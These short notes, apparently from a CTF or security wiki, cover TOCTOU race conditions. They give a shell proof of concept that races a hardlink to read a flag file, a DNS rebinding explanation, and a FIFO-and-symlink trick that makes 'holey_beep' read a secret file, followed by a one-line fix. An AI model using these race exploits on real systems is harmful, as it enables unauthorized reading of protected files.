Link to this headingTime of Check Time of Use

ReadLink TOCTOU PoC:

cd /home/user cp /bin/cat 'asdf (deleted)' #Start Loop while true; do ln /home/poetry/poerty ./asdf; (./asdf ../poetry/flag &); rm asdf; done

Link to this headingDNS

Looking up the IP of a DNS address to test if it in a exclusion list. Then making a request to the domain. Since this makes a second DNS request this could resolve to a IP that is on the exclusion list.

Link to this headingLinux

Using a Pipe to create a wait state in a executable

PoC:

cd /tmp mkdir dev ln -s /secret_cake_recipe /tmp/dev/console mkfifo /tmp/xyz /home/user/holey_beep $(seq 1 1 5000) 2> /tmp/xyz & (sleep 30; cat - ) < /tmp/xyz & pgrep holey_beep | head -c 100 kill -15 12

Link to this headingFixes

Open the file as a filehandle and cache any errors.